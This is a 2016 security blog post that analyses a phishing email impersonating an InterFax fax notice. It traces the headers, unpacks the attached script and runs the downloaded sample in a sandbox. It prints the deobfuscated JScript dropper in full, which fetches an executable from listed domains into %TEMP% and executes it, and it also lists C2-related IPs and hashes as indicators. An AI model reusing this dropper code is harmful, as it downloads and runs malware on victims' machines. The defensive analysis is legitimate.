2016/02/08

Something Phishy – 02-08-2016

by Destruct_Icon
Categories: Analysis, Coding, JavaScript, Network Forensics
Tags: , ,
Comments: 1 Comment

Something Phishy – Return of the Fax!

And we’re back with another “Something Phishy” for February. If you ever had a postal receipt sent to your e-mail, some of the behaviors may feel very familiar to you.

DIphisy2-1

Apparently I received a fax from incoming@interfax.net. Let’s start by pulling all the information we can out of the headers.

All IPs and Domains referenced in the headers point to GoDaddy.

  1. p3plibsmtp01-08.prod.phx3.secureserver.net
  2. p3slh051.shr.phx3.secureserver.net
  3. 72.167.238.224
  4. 208.109.80.23
  5. 68.178.254.202

Sender Info of interfax is probably impersonated. The only other address I could identify in the headers was “swatwebteam”.

  1. swatwebteam@p3slh051.shr.phx3.secureserver.net
  2. incoming@interfax.net

Looking for the swatwebteam on google doesn’t return much as it relates to secureserver and may be something to search for in your environment. Let’s check out this interfax e-mail and see if there’s anything interesting about it.

DIphisy2-2

It’s safe to say we can jump to the conclusion that this is bad but let’s dive a bit into what was attached.

* The base64 of the attached file.

DIphisy2-3

Here’s the PK-fire now let’s see what’s inside.

DIphisy2-4

This looks semi-similar to what we saw in our first “Something Phishy” post. Let’s deobfuscate the code and see what we can pull from it.

var b = "ecatt.org intecpi.com settlerscovewines.com ".split(""); 
var ws = WScript.CreateObject("WScript.Shell "); 
var fn = ws.ExpandEnvironmentStrings(" % TEMP % ")+String.fromCharCode(92)+"794772 "; 
var xo = WScript.CreateObject("MSXML2.XMLHTTP "); 
var xa = WScript.CreateObject("ADODB.Stream "); 
var ld = 0; 
for (var n=1; n<=3; n++) { 
    for (var i=ld; i<b.length; i++) { 
        var dn = 0; 
        try { 
            xo.open("GET ","http: //"+b[i]+"/counter/?id="+a22+"&rnd=283265"+n, false); 
            xo.send(); 
            if (xo.status == 200) { 
                xa.open(); 
                xa.type = 1; 
                xa.write(xo.responseBody); 
                if (xa.size > 1000) { 
                    dn = 1; 
                    xa.position = 0; 
                    xa.saveToFile(fn+n+".exe",2); 
                    try { 
                        ws.Run(fn+n+".exe",1,0); 
                    } 
                    catch (er) { 
                    }; 
                }; 
                xa.close(); 
            }; 
            if (dn == 1) { 
                ld = i; 
                break; 
            }; 
        } catch (er) { 
        }; 
    }; 
};

Unfortunately beautifiers weren’t working for me so I had to manually pretty-fy it so hopefully I didn’t miss any of the line breaks. Things are now feeling very familiar with both methods and behavior. Below are the immediate indicators to search for.

  1. ecatt.org
  2. intecpi.com
  3. settlerscovewines.com

Let’s build out the urls and pull the malware down so we can do a bit of analysis.

hxxp://settlerscovewines[.]com/counter/?id=555C535E00011710161107103B0D070B0A2409050813011601130B08024A070B095E3C5E171305100001170D030A0B0A080D0A014A070B095E17565E5550515050525D55515D5E55&rnd=2832651

DIphishy2-5

A picture? Naaaah!

DIphishy2-6

Executable Information

  1. MD5=8213fa36e697f524611680df3e887b6c
  2. https://www.virustotal.com/en/file/26d2173e24c751fbdd0f163ac68bbb98d075674bbfa5e2d14370e661411d658a/analysis/

When run in a sandbox, it looks like it tries to check for an internet connection. There’s also some interesting reg values that try and get set. Seems to be random based on multiple runs.

  1. RegSetValueEx(HKLM\software\3YvNoi95J\TI01YxJwf, REG_SZ: -TONS OF DATA HERE-
  2. RegSetValueEx(HKLM\SOFTWARE\F71B5913936CBADD67\\FA59BFD93688FD6535B, REG_SZ: FA59BFD93688FD6535B)
  3. RegDeleteValue(HKLM\SOFTWARE\F71B5913936CBADD67\\FA59BFD93688FD6535B)

Below are some of the imports and file information.

DIphishy2-7

DIphishy2-8

  1. Compilation Time: 04/02/2016 23:25:13
  2. File Description: Denials Queenliness Redrafts Frivolous

Detonating the malware provides some interesting results. There are many call outs starting with attempts to hit “upload.php” and “/” on a few different IPs.

DIphishy2-9

DIphishy2-10

IP Observables

  1. 102.21.177.115
  2. 102.84.96.76
  3. 104.162.255.220
  4. 109.93.82.124
  5. 11.27.53.83
  6. 111.155.108.238
  7. 119.79.113.80
  8. 12.236.239.208
  9. 122.239.86.186
  10. 123.160.251.144
  11. 124.138.235.68
  12. 124.21.209.92
  13. 126.44.199.84
  14. 131.101.130.209
  15. 132.228.139.99
  16. 137.6.250.231
  17. 14.79.199.211
  18. 147.120.47.254
  19. 154.135.3.42
  20. 160.231.33.235
  21. 17.113.240.167
  22. 174.16.129.254
  23. 178.33.69.66
  24. 193.61.238.201
  25. 201.237.188.134
  26. 202.78.57.41
  27. 202.90.90.148
  28. 208.178.79.25
  29. 211.139.120.87
  30. 214.17.10.183
  31. 215.186.209.160
  32. 216.105.83.243
  33. 218.205.206.156
  34. 221.12.59.208
  35. 25.39.173.179
  36. 32.194.21.3
  37. 36.119.68.47
  38. 6.86.248.254
  39. 62.39.39.87
  40. 64.149.33.125
  41. 66.214.63.212
  42. 69.197.172.170
  43. 8.136.142.140
  44. 90.69.59.241
  45. 92.103.135.100
  46. 93.194.204.208
  47. 95.214.112.156
  48. 97.2.37.41
  49. 97.44.144.135

Ports Observables

  1. 80
  2. 8080
  3. 443

We used a modified version of our VT lookup scripts so that it would check IPs and see if they had any hits on Virus Total.

  1. Hit Count: 3 – http://178.33.69.66/upload.php has been identified as malicious.
  2. Associated with: Hit Count: 1 – http://davisheritage.com/ has been identified as malicious.

It definitely looks like there is some badness. A portion of these IPs may be related to the CNC of the malware but keep in mind that there could be legitimate calls used as connectivity checks and/or red herrings. All-in-all this isn’t something extremely new and has behavior of the “postal receipt” days of yore. The network communication is extremely noisy as a minute in our controlled environment had thousands of attempts out. One of the more interesting things to note is that all of the attempts that hit the upload.php and root pages responded with 404s or 400s. Keep an eye out for the incoming@interfax.net e-mail as it appears to be part of a campaign that’s been hitting many people over the past few months. Don’t forget to educate your users and tell them “Don’t talk to strangers!”.


1 Comment »

  1. Vickyz says:

    Hello can you help me how to download file from virustotal.com
    Thanks before.

Leave a Reply

Your email address will not be published. Required fields are marked *



Today is Tuesday
2017/06/27